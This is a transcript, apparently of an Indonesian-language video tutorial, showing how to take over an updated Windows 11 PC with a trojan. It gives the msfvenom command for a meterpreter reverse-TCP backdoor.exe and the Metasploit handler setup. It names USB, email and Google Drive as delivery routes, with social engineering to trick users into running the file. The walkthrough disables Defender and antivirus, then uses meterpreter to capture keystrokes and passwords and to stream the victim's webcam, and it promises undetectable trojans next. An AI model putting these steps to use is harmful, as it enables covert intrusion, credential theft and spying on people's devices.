Sampai sejauh ini, kita sudah berhasil melakukan exploitation, baik itu exploitation pada Windows 7 ataupun pada Windows 10, dengan catatan bahwa Windows yang kita jadikan target exploitation sebelumnya, yaitu adalah Windows versi terdahulu, yaitu Windows 7 Ultimate dan Windows 10 versi 19H1 yang memiliki vulnerability tertentu. Misalnya, vulnerability pada service SMB yang ada pada port 139 dan 445, yang bisa kita serang dengan menggunakan Eternal Blue, Double Closure, dan Bluekeep pada Windows 7, dan SM Bleeding Ghost pada Windows 10 sebelumnya. Oke, nah sekarang bagaimana kalau Windows yang ingin kita exploit tersebut adalah Windows versi terbaru yang sudah update dan tidak memiliki vulnerability apapun? Oke, apakah kita masih bisa mengeksploitnya? Dan jika bisa, bagaimanakah cara kita mengeksploit Windows yang sudah update tersebut? Oke, nah di video kali ini kita akan belajar cara mengeksploit Windows versi terbaru. Ya, misalnya saya akan gunakan Windows yang saya install pada laptop saya sendiri, yaitu Windows 11 Home Single Language versi 21H2. Dan Windows ini sudah saya update dan saya schedulekan update setiap minggu. Oke, jadi sudah cukup update sekali dan kita akan lihat apakah kita bisa memperoleh akses pada Windows yang sudah update seperti ini. Oke, dan cara kita untuk memperoleh akses pada Windows yang sudah update ini itu berbeda dari sebelumnya. Jika sebelumnya kita melakukan remote access, oke, hanya melalui Kali Linux saja. Nah, di kali ini untuk mengakses Windows 11 ini yang sudah update ini, kita akan menggunakan sebuah malware yang disebut dengan Trojan. Apa itu Trojan? Trojan ini adalah sebuah malicious software yang disingkat dengan malware yang merupakan file exe yang berbahaya. Oke, yang mana di dalam file exe tersebut kita masukkan payload yang kita gunakan untuk memperoleh akses pada target mesin. Nah, beda dari sebelumnya, untuk menggunakan Trojan ini, kita harus memasukkan Trojan ini sendiri ke dalam target mesin. Nah, caranya bisa saja kita gunakan USB, oke, ataupun kita kirim melalui email, atau melalui Google Drive, apapun caranya. Yang penting, malware ini, Trojan ini bisa masuk ke dalam target mesin, oke? Dan user dari target mesinnya harus menjalankan malware tersebut, oke? Nah, caranya bisa saja kita buat Trojannya, kita masukkan Trojannya ke dalam sebuah program, oke? Dan ketika user itu mendownload dan menginstall, kemudian menjalankan program tersebut, maka Trojannya akan berjalan dan memberi kita akses. Ataupun kita buat dalam bentuk gambar, oke, kita sisipkan malware atau Trojannya ke dalam gambar, dan ketika usernya membuka gambarnya, maka kita akan memperoleh akses kepada target mesin tersebut. Oke, ya, membutuhkan sedikit skill pada social engineering, ya. Bagaimana cara kita merekayasa sosial, oke, mempengaruhi usernya, sehingga usernya bisa kita trik untuk membuka malware yang kita buat, yaitu Trojan. Oke, untuk membuat Trojan ini, kita akan membuka Linux kembali, Kali Linux, oke. Trojan ini bisa kita buat dengan menggunakan tool MSF Venom, oke. Perlu kita ingat bahwa walaupun kita bisa membuat Trojan, kita masukkan ke target Windows untuk memperoleh akses, kita masih memiliki satu rintangan lagi, yaitu kita harus melewati Windows security-nya, seperti Windows Defender
dan juga antivirus yang diinstal pada Windows tersebut. Oke, nah Trojan yang kita masukkan ke Windows tersebut bisa saja ditepis, dihapus, dan dihalang oleh Windows Defender dan antivirus sehingga tidak bisa berfungsi sesuai yang kita harapkan. Oke, untuk itu nanti kita akan buat Trojan dimulai dari Trojan yang paling simple yang masih bisa dideteksi oleh antivirus dan Windows Defender sampai ke Trojan yang tidak terdeteksi oleh Windows Security-nya, baik itu antivirus ataupun Windows Defender-nya. Oke. Nanti itu kita akan mulai membuat Trojan yang sederhana, yang simple, yang bisa kita jalankan untuk memperoleh akses pada target Windows tersebut, tetapi masih bisa dideteksi oleh Windows Defender dan antivirus. Dan untuk menjalankannya, kita harus mematikan Windows Defender dan antivirus pada target mesin tersebut. Oke, kita akan langsung buka MSF Venom. Ketik Oke, mungkin kita CD ke desktop dulu. CD desktop. Oke, kita buka MSF Venom. Oke, MSF Venom. Tekan enter. Dan kita bisa lihat di sini cara menggunakan MSF Venom, dan kita di sini diberi error karena kita tidak memberikan opsi setelah komen MSF Venom tersebut. Jadi kita harus memasukkan opsi-opsinya seperti L, ya, list. Di sini kita bisa baca list all modules. Oke, ini yang terpenting yaitu P, payload. Kita bisa masukkan payload tertentu kepada MSF Venom kita untuk melakukan kontrol pada target mesin. Oke. Kemudian ada opsi F untuk formatnya, misalnya format EXE. Oke. Ada encoders, dan kita bisa lihat di sini banyak sekali opsi yang bisa kita gunakan untuk membuat sebuah Trojan dengan MSF Venom. Oke, kita akan mulai dari yang paling simple, yaitu kita akan gunakan opsi P, payload, kemudian kita masukkan opsi F untuk formatnya, dan opsi O untuk outputnya. Oke, kita clear dulu. Ketik MSF Venom, kemudian strip P, kemudian kita masukkan jenis payload yang ingin kita gunakan. Oke, karena kita ingin mengakses Windows 11, artinya kita akan mengakses Windows yang versi 64-bit. Oke, kita ketik di sini Windows X64. Kita akan gunakan meterpreter, kemudian reverse TCP, yang artinya kita akan membuka port kita sendiri, ya. Itu disebut dengan reverse TCP, port dari Kali Linux kita, dan kita akan menunggu koneksi yang datang dari target mesin tersebut. Oke, setelah opsi P tersebut, kita masukkan kita masukkan IP address dari Kali Linux kita sebagai listening host. Jadi lhost sama dengan, ya, IP address-nya bisa kita lihat di sini. Kita buat tab baru. Ya, cek ifconfig. Oke. 192.168.149.212. Oke. 192.168.149.212. Kemudian kita juga harus membuka port tertentu. Jadi portnya bisa kita buat port berapa saja, misalnya 9999. Oke. Ya, kalian bisa buat port berapa saja, terserah, tidak masalah, ya. Misalnya port 999. Nah, setelah itu kita masukkan opsi F. F ini adalah format dari file yang kita inginkan. Karena kita ingin menjalankannya di Windows, jadi kita ingin membuat formatnya menjadi EXE. Oke? Nah, kemudian baru kita buat kita buat inputnya O. Nama dari filenya adalah, misalnya kita buat nama backdoor.exe.
Oke. Nah, setelah kita selesai, tekan enter, dan kita akan tunggu proses pembuatan trojannya. Oke, nah sekarang kita sudah selesai. Ini sudah tersimpan dengan nama backdoor.exe. Oke, kita bisa lihat dengan menggunakan ls. Oke, pada desktop, ya ini ada backdoor.exe. Oke, kita bisa lihat langsung di desktop kita. Ini dia, backdoor.exe. Nah, oke, seperti yang saya jelaskan tadi, untuk menjalankan backdoor.exe ini, kita harus memasukkan file ini kepada target mesin. Ya, caranya terserah kita. Apakah bisa kita lakukan dengan USB, oke, kita masukkan melalui USB, atau kita kirim melalui email, atau kita share melalui Google Drive. Apapun cara yang kita lakukan, yang penting tujuannya adalah supaya file ini bisa masuk ke target system dan bisa dijalankan. Oke, oke, untuk contohnya, kita, karena ini di mesin kita sendiri, jadi saya akan langsung drag and drop saja. Oke, oke, mungkin saya tidak akan mendrag and drop, karena tadi setelah saya coba drag and drop, terjadi sedikit problem, filenya tidak bisa pindah ke Windows, saya belum tahu apa penyebabnya. Untuk itu saya akan gunakan shared folders, oke. Jadi shared folders ini bisa kita gunakan untuk membagikan file dari Kali Linux di virtual machine ke Windows kita, oke. Ke localhost. Untuk membuat shared folders, kalian klik pada devices di sini, kemudian pilih shared folders. Oke, shared folders, kemudian pilih shared folder setting. Oke, di sini kalian klik pada machine folders, kemudian di sebelahnya ada tombol folder dengan warna biru itu yang ada tanda tambah dan berlabel add new shared folders. Kalian klik itu, kemudian di sini pada tanda panahnya di sebelah kanan ini kalian pilih other. Oke. Nah, di sini kalian bisa pilih lokasi di mana shared folders kalian ingin buat. Oke, misalnya saya buat di dokumen. Kemudian pilih new folder. Buat nama shared foldersnya. Misalnya virtual box folder. Oke, virtual box folder. Kemudian pilih select folder. Oke, di sini kita lihat folder name-nya sudah terisi secara otomatis vbox folder. Kemudian di sini kita checklist yang auto mount. Kemudian jika kita ingin membuatnya permanen, oke, maka kita checklist pada make permanen. Kemudian klik OK. Nah, ini adalah foldernya, set foldersnya. Kemudian klik OK lagi. Dan setelah itu, kita buka terminal. Oke, di terminal ini kita ketik sudo, oke, kemudian usermod, oke, sudo user ya, usermod, oke. Setelah itu ketik A kecil, kemudian G besar, oke. Kemudian virtualbox sf, oke, shared folder. Kemudian masukkan nama username dari Kali Linux kalian. Misalnya ini Rambo, oke. Kemudian masukkan passwordnya, tekan enter, oke. Setelah kalian berhasil menjalankan komen ini komen kita jalankan supaya kita bisa bergabung kepada shared folders yang sudah kita buat di Windows tadi, oke. Setelah ini kita harus merestart Kali Linux, oke. Kita restart. Oke, restart.
Oke, setelah di restart, baru kita bisa pindahkan file backdoor.exe ini ke dalam folder yang kita buat tadi. Oke, kita buka folder sini, home. Oke, kita open folder. Kemudian di sini kita cari sf vbox folder. Ini dia, sf vbox folder. Oke, nah ini adalah di mana kita akan mengcopy file yang ingin kita bagikan ke Windows. Oke, mungkin kita copy dulu. Kita pergi ke desktop. Oke, ini dia desktop. Ini adalah backdoor-nya tadi. Klik kanan, kemudian pilih copy, kemudian buka sf vbox folder dan paste di sini. Oke. Nah, kemudian background-nya sudah ada di sini. Oke, tapi sebelum kita buka di Windows, kita harus matikan dulu Windows Security-nya, yaitu Windows Defender dan juga antivirus. Kalian klik Control Panel, buka Control Panel, pilih System and Security, kemudian pilih Windows Defender Firewall. Kemudian pada yang di sebelah kiri ini, kalian pilih Turn Windows Defender Firewall on or off. Oke, kemudian kalian turn off yang ini dan juga yang ini. Turn off, klik OK. Dan jika kalian memiliki antivirus, kalian harus nonaktifkan dulu sementara, oke, seperti SMADAV, Disable Protection. Dan juga jika kalian memiliki antivirus yang lain, juga harus kalian nonaktifkan. Ini karena Trojan yang kita buat itu adalah Trojan yang masih cukup sederhana, yang simple, yang masih bisa dideteksi oleh Windows Security. Nanti kita akan buat Trojan yang fully undetectable, yang tidak bisa terdeteksi oleh Windows Security. Oke. Nah, untuk melihat file yang kita share melalui shared folders tadi, kalian buka Windows File Explorer. Ya, tadi saya buat di dokumen ya. Saya akan cari folder yang saya buat tadi. Nama foldernya adalah VirtualBox folder. Oke, di mana dia? VirtualBox folder. Oke, ini dia. VM folder. Oh, bukan ya, yang ini ya. VirtualBox folder, ini dia. VirtualBox folder, saya buka itu. Dan kita lihat di sini sudah ada file backdoor.exe yang sudah kita copy ke sini tadi. Oke. Nah, kita bisa jalankan file ini untuk menjalankan exploit yang bisa memberi kita akses kepada Windows. Oke, tapi sebelum kita jalankan file backdoor.exe ini, pertama kita akan buka dulu Kali Linux lagi. Oke. Buka terminal. Kita akan buka Metasploit. Ketik msf console. Ya, di Metasploit ini kita akan buka port 999 yang kita buat tadi sebagai listening port. Oke, sehingga ketika kita jalankan file backdoor.exe di Windows nanti dia akan terkonek ke Kali Linux kita. Oke, di MSF 6 ini, pada Metasploit ini, kita ketik use, kita akan gunakan exploit, kemudian multi, kemudian handler. Oke, exploit multi handler, akan enter. Oke, kita bisa ketik show option di sini. Ya, kita harus isi lhost-nya dulu. Tadi saya sudah lupa apa IP address dari Kali Linux ya. fconfig, IP address-nya adalah 149212. Oke, 149212. Kita sini set lhost 192.168.149.212. Oke. Kemudian kita set lport. Ya, lport-nya kita set seperti yang kita buat pada MS Venom-nya tadi, yaitu port 9999. 9999. Oke. Kemudian kita set payload-nya.
Ya, kita set payload. Kita akan gunakan meter-preter ya. Set payload, yaitu meter-preter untuk Windows 64-bit, karena kita mengeksploit Windows 11, oke. Windows x64, kemudian meter-preter, kemudian reverse TCP, oke. Tekan enter, dan setelah itu kita bisa langsung run exploitnya. Kita ketik run ataupun exploit, oke. Tekan enter. Oke, di sini kita lihat sedang menunggu koneksi pada port 999. Oke, untuk itu kita akan jalankan. Oke, mungkin ini kita akan pindah ke desktop saja. Kita send ke desktop. Oke. Ya, ini dia backdoor. Nah, kita akan jalankan file ini. Kita akan lihat apakah akan terkonek ke Kali Linux kita. Oke. Kita klik 2 kali. Dan kita lihat di sini kita sudah berhasil mengeksploit Windows 11 yang full update, yang tidak memiliki vulnerability dengan menggunakan Trojan. Oke. Tetapi dengan catatan Windows Defender kita nonaktifkan dan juga antivirusnya kita nonaktifkan, karena Trojan yang kita buat ini adalah Trojan yang masih simple. Oke. Nanti kita akan belajar cara membuat Trojan yang tidak bisa dideteksi oleh Windows Defender. Oke, nah sekarang kita sudah berada di meter-preter. Kita bisa melakukan apapun yang kita inginkan di sini sesuai dengan komen-komen yang tersedia pada meter-preter. Oke, misalnya kita cek IP address-nya, ifconfig. Oke, nah ini adalah IP address dari Windows-nya. Oke, kemudian kita juga bisa jalankan komen-komen yang lain. Oke, misalnya dir, oke, pwd, oke. Ya, kita sedang berada pada folder VirtualBox. Oke. Oke, saya sudah janjikan sebelumnya bahwa ketika kita melakukan praktek exploitation baik pada Windows 10 atau Windows 11 ini, saya akan menunjukkan cara menggunakan keylogger. Oke. Nah, sekarang untuk menjalankan keylogger, kita bisa ketik help di sini untuk melihat komen apa yang bisa kita gunakan. Nah, kita lihat di sini ada komen keyscan. Oke, ada keyscan start untuk memulai keyloggernya. Kemudian keyscan dump untuk melihat hasil dari keyloggernya. Dan keyscan stop untuk menghentikan keyloggernya. Oke, kita akan mulai dengan komen keyscan start. Ini akan memulai start. Dia akan menyimpan semua key yang kita tekan pada Windows kita. Misalnya saya buka ini, saya buka Notepad dan saya ketik sesuatu di Notepad. Oke, Notepad. Oke, saya ketik misalnya saya akan menyimpan username dan password di sini. Username ABCD, kemudian password 1234 misalnya. Oke, nah sekarang untuk melihat apa yang kita ketik di Windows di keylogger di sini, kita bisa ketik key scan garis bawah kemudian dump. Oke, tekan enter dan kita bisa lihat di sini semua yang kita tekan dan kita ketik pada Windows akan ada di sini. Oke. Misalnya ini password, ya username. Username-nya adalah ABCD. Oke. Ya, termasuk tombol misalnya seperti save ya. Itu akan direkam. Oke. Dan passwordnya adalah 123. Oke. Nah, itu cara kita menggunakan keylogger. Oke. Jadi apapun yang kita lakukan di sini, kita ketik, oke. Dia akan bisa melihat di sini. Misalnya keyscan
Kita klik lagi keyscan, dump, dan kita lihat ini adalah karakter yang kita ketik pada notepad di sini. Oke, jadi sangat berbahaya sekali ketika kita misalnya login ke sebuah akun Facebook ataupun akun-akun yang lain ketika Windows kita sedang diakses dan dijalankan keylogger, maka password dan username dari akun kita akan bisa dilihat oleh hacker. Oke, itu cara menjalankan keylogger. Oke, kemudian untuk menghentikan keylogger kita bisa ketik key scan, kemudian stop, dan dia akan menghentikan keylogger. Dan kemudian kita juga bisa menjalankan webcam ya. Kita bisa mengakses kamera dari target mesin, oke, dengan menjalankan command webcam stream. Oke. Sekarang saya contohkan. Ketik webcam, kemudian stream. Webcam stream ini hanya bisa berjalan jika Windows dari target mesinnya memiliki webcam, oke, memiliki kamera. Dan jika ini saya tekan enter, dia akan memulai stream mengakses kamera. Dan kalian bisa lihat di sini, oke. Ya, kita bisa mengakses kamera dari target mesin seperti ini. Oke, ini kita stop. Oke, untuk menghentikan webcam streamnya, kalian tekan Ctrl C. Oke, dia akan kembali ke mesin, ke cell interpreter. Oke, ada banyak sekali komen-komen lain yang bisa kita jalankan di sini, di interpreter ini. Oke, kalian bisa cek sendiri, ketik help, dan kalian coba jalankan satu persatu. Oke, misalnya ketik ps di sini, dia akan tampilkan semua proses yang berjalan. Oke, begitulah cara kita mengakses Windows yang tidak memiliki vulnerability. Kita bisa menggunakan malware, malicious software, seperti Trojan ini, yang bisa kita buat dengan menggunakan MSF Venom. Oke, nah Trojan ini adalah Trojan yang cukup simpel, yang masih bisa dideteksi oleh antivirus ataupun Windows Defender. Oke, kita bisa melihat antivirus apa saja yang bisa mendeteksi Trojan yang kita buat ini. Ini karena Trojannya masih cukup simpel ya. Nah, ini kita tutup saja, kita exit. Oke, exit lagi. Kita akan besarkan ini, maximize. Ya, kalian bisa buka Firefox di Kali Linux. Oke, di Kali Linux ini kalian ketik virus. Oke, virus total. Tekan enter. Nah, di virus total ini kalian bisa upload Trojan yang kalian buat tadi, dan di situ akan nampak antivirus apa saja yang dapat mendeteksi Trojan yang kalian buat. Oke, ada berapa antivirus yang bisa mendeteksinya. Kalian klik pada virus total itu, kemudian choose file, dan kalian masukkan file yang kalian buat tadi, yaitu backdoor.exe. Oke, open. Kemudian confirm upload. Oke, dia akan men-scan file yang kita buat tadi, yang kita masukkan tadi. Dan di sini kita bisa melihat hasilnya. Antivirus apa saja yang bisa mendeteksi file yang kita buat tadi sebagai malware. Oke. Nah, kita lihat di sini ada add aware antivirus. Ya, file yang kita buat tadi dideteksi sebagai Trojan Metasploit. Ya, tidak dapat dideteksi ya. Ya, ini adalah antivirus yang sering kita gunakan, seperti AVG ya. Ya, juga bisa mendeteksi file yang kita buat tadi.
Avira, oke. Dan ada juga antivirus yang belum bisa mendeteksi file yang kita buat tadi sebagai malware atau software yang berbahaya, oke. Jadi ada banyak antivirus, di sini ada 52 antivirus. Oke, nanti kita akan buat Trojan yang lebih advance lagi, sehingga tidak ada satupun antivirus di sini yang dapat mendeteksi Trojan yang kita buat tersebut. Oke, nah untuk Trojan yang sederhana ini, ada sebanyak 52 antivirus yang bisa mendeteksinya. Oke, kita akan lanjutkan pembuatan Trojan ini ke part selanjutnya. Mungkin kita akan membuat Trojan kita dalam bentuk image, oke, ataupun dalam bentuk software.